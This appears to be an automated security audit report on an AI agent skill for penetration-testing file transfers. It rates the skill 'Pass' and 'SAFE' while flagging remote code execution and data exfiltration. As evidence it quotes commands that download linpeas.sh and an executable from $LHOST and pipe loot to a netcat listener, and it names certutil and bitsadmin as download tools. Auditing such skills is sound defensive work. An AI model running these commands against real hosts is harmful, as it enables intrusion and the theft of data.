payloads-file-transfers
Pass
Audited by Gen Agent Trust Hub on Sep 20, 2026
Risk Level: SAFEREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONCOMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill contains templates for downloading and staging executable scripts from a remote server controlled by the user.
- Evidence:
wget http://$LHOST/linpeas.sh -O /tmp/l.shin SKILL.md - Evidence:
curl http://$LHOST/linpeas.sh -o /tmp/l.shin SKILL.md - Evidence:
powershell iwr http://$LHOST/x.exe -o C:\Windows\Temp\x.exein SKILL.md - [DATA_EXFILTRATION]: The skill documents procedures for moving data from a target host to an external listener.
- Evidence:
nc $LHOST 4444 < /path/lootin SKILL.md - Evidence:
base64 -w0 /path/lootdescribed as a method for exfiltration in SKILL.md - [COMMAND_EXECUTION]: The skill makes use of powerful system binaries (LOLBAS) to facilitate file movement and network communication.
- Evidence: Instructions for using
certutil,bitsadmin,powershell, andpythonto download files from remote locations.
Audit Metadata